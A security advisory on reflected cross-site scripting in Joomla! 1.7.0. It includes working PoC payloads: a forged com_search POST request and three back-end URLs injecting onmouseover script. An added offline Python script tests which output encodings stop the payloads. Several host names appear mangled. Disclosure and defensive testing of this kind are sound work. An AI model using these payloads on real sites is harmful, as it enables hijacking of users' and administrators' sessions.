Joomla! 1.7.0 | Multiple Cross Site Scripting (XSS) Vulnerabilities
1. OVERVIEW
Joomla! 1.7.0 (stable release) contains multiple cross-site scripting (XSS)
vulnerabilities.
2. BACKGROUND
Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
model-view-controller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.
3. DESCRIPTION
Several parameters (searchword, extension, asset, author) of Joomla!
core components are reflected into the HTML response without proper
output encoding. searchword is reflected by the front-end search
component (com_search, submitted to /index.php); extension, asset and
author are reflected by the back-end components com_categories and
com_media (/administrator/index.php). The front-end payload closes a
single-quoted JavaScript string inside an inline event handler and
appends its own code; the back-end payloads close a double-quoted
attribute, add an onmouseover handler together with a style that
stretches the element over the whole viewport so that any mouse movement
fires it, and swallow the remainder of the original attribute with x=".
An attacker can therefore craft a URL (or, for com_search, a form that
posts on the victim's behalf) that executes arbitrary script code in the
victim's browser in the context of the Joomla! site.
4. AFFECTED VERSIONS: <= 1.7.0
5. PROOF-OF-CONCEPT/EXPLOIT
Component: com_search, parameter: searchword (browsers: IE, Konqueror).
The two String.fromCharCode() calls in the payload decode to the confirm()
text "You've got a message from Administrator! / Do you want to go to
Inbox?" and the alert() text "You've got XSS!".
=====================================================================
[REQUEST]
POST /joomla17_noseo/index.php HTTP/1.1
Host: HdhCmsTest2cto测试数据
Accept: */*
Accept-Language: en
User-Agent: MSIE 8.0
Connection: close
Referer: http://HdhCmsTest2cto测试数据/joomla17_noseo
Content-Type: application/x-www-form-urlencoded
Content-Length: 456
task=search&Itemid=435&searchword=Search';onunload=function(){x=confirm(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,97,32,109,101,115,115,97,103,101,32,102,114,111,109,32,65,100,109,105,110,105,115,116,114,97,116,111,114,33,10,68,111,32,121,111,117,32,119,97,110,116,32,116,111,32,103,111,32,116,111,32,73,110,98,111,120,63));alert(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,88,83,83,33));};//xsssssssssss&option=com_search
[/REQUEST]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
The following vectors require an authenticated login to the back-end
(/administrator/).
Parameter: extension, Component: com_categories
====================================================
http://HdhCmsTest2cto测试数据/joomla17_noseo/administrator/index.php?option=com_categories&extension=com_content%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22
Parameter: asset, Component: com_media
====================================================
http://HdhCmsTest2cto测试数据/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22&author=
Parameter: author, Component: com_media
====================================================
http://HdhCmsTest2cto测试数据/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=&author=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
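The script below is an added example written for this page; it is not part of the YGN advisory and not Joomla! code. It serves sections 3 and 5 together: it decodes the String.fromCharCode() strings in the com_search payload above, then rebuilds the two reflection contexts the PoCs exploit in hypothetical template lines (render_search_input() and render_hidden_asset() are assumptions made here, not Joomla! 1.7.0's real markup) and checks which output encoding closes each. The contrast it demonstrates: for the asset/author/extension style payload (1" onmouseover=...), a plain attribute context, HTML attribute encoding alone is enough; for searchword, reflected inside a JavaScript string in an inline event handler, HTML encoding is not enough, because the browser decodes entities before the script parser sees the string, so the value has to be JavaScript-string-escaped first and HTML-attribute-encoded second (or the inline handler dropped altogether). The payload constants are copied from section 5; everything else is this example's own.

```python
# Added example for this advisory (not YGN's or Joomla's code): decode the
# com_search PoC payload, rebuild the two reflection contexts the section 5
# PoCs target in hypothetical template lines, and test which output encoding
# closes each. Runs offline; nothing is sent to any server.
import html
import re

# searchword value from the section 5 POST body, copied from the advisory.
SEARCHWORD_PAYLOAD = (
    "Search';onunload=function(){x=confirm(String.fromCharCode("
    "89,111,117,39,118,101,32,103,111,116,32,97,32,109,101,115,115,97,103,101,32,"
    "102,114,111,109,32,65,100,109,105,110,105,115,116,114,97,116,111,114,33,10,"
    "68,111,32,121,111,117,32,119,97,110,116,32,116,111,32,103,111,32,116,111,32,"
    "73,110,98,111,120,63));alert(String.fromCharCode("
    "89,111,117,39,118,101,32,103,111,116,32,88,83,83,33));};//xsssssssssss"
)
# asset value from the section 5 com_media URL, URL-decoded.
ASSET_PAYLOAD = ('1" onmouseover="alert(/XSS/)"style="width:3000px!important;'
                 'height:3000px!important;z-index:999999;position:absolute!'
                 'important;left:0;top:0;"x="')

_FROMCHARCODE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")
_ONFOCUS = re.compile(r'onfocus="([^"]*)"')
_ATTR = re.compile(r'([A-Za-z_:][\w:.-]*)="[^"]*"')
HANDLER_PREFIX = "if(this.value=='"
HANDLER_TAIL = "') this.value='';"


def decode_fromcharcode(js: str) -> list:
    """Plain text of every String.fromCharCode(...) call found in `js`."""
    return ["".join(chr(int(n)) for n in m.group(1).split(","))
            for m in _FROMCHARCODE.finditer(js)]


def js_string_escape(value: str) -> str:
    """Escape for a JS string literal: everything but letters, digits and
    spaces becomes \\xHH or \\uHHHH, so quotes, backslashes, line terminators,
    '<', '/' and '&' can neither end the literal nor form new tokens."""
    return "".join(
        ch if ch.isalnum() or ch == " "
        else f"\\x{ord(ch):02x}" if ord(ch) < 0x100
        else f"\\u{ord(ch):04x}"
        for ch in value)


def render_search_input(searchword: str, mode: str) -> str:
    """Hypothetical template line (assumption, not Joomla's real markup): the
    value goes into a value="" attribute and into a single-quoted JS string in
    an inline onfocus handler. mode: "raw" (vulnerable), "html" (HTML attribute
    encoding only), "js+html" (JS string escape, then HTML attribute encoding)."""
    if mode == "raw":
        attr = js = searchword
    elif mode == "html":
        attr = js = html.escape(searchword, quote=True)
    elif mode == "js+html":
        attr = html.escape(searchword, quote=True)
        js = html.escape(js_string_escape(searchword), quote=True)
    else:
        raise ValueError(f"unknown mode {mode!r}")
    return (f'<input type="text" name="searchword" value="{attr}" '
            f"onfocus=\"if(this.value=='{js}') this.value='';\">")


def handler_source(markup: str) -> str:
    """The script a browser compiles for onfocus: the attribute value after
    HTML entity decoding. That is why &#x27; is no defence in this context;
    it is a quote again before the JavaScript parser runs."""
    m = _ONFOCUS.search(markup)
    if m is None:
        raise ValueError("no onfocus attribute")
    return html.unescape(m.group(1))


def payload_breaks_out(markup: str) -> bool:
    """True if the reflected value ends the JS string literal early, so the
    text after it runs as code instead of the template's own tail."""
    src = handler_source(markup)
    if not src.startswith(HANDLER_PREFIX):
        return True
    i = len(HANDLER_PREFIX)
    while i < len(src):
        if src[i] == "\\":      # a backslash escape consumes the next char
            i += 2
            continue
        if src[i] == "'":       # first unescaped quote ends the literal
            return src[i:] != HANDLER_TAIL
        i += 1
    return True                 # unterminated literal: broken as well


def render_hidden_asset(asset: str, escape: bool) -> str:
    """Hypothetical hidden field for com_media's asset parameter (assumption):
    a plain attribute context, where HTML attribute encoding alone suffices."""
    v = html.escape(asset, quote=True) if escape else asset
    return f'<input type="hidden" name="asset" value="{v}">'


def attribute_names(markup: str) -> list:
    """Attribute names a browser would see on one double-quoted element."""
    return [m.group(1) for m in _ATTR.finditer(markup)]
```

For the three modes of render_search_input(), payload_breaks_out() returns True, True, False: the &#x27; that html.escape() emits keeps the value attribute intact but is decoded back to a quote before the handler's script is parsed, so only the js+html mode keeps the payload inside the string literal. For the hidden asset field, attribute_names() shows the injected onmouseover and style attributes disappearing as soon as the value is attribute-encoded. The same check, run against a real response body instead of these constructed lines, is how to confirm a fix rather than trusting a version number.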
6. IMPACT
An attacker can run script in the browser of a currently logged-in
user or administrator, take over that session, and perform any action
available to the victim under /administrator/ on the victim's behalf.
7. SOLUTION
Upgrade to a newer version.
8. VENDOR
Joomla! Developer Team
http://HdhCmsTestjoomla.org
#yehg [2011-09-29]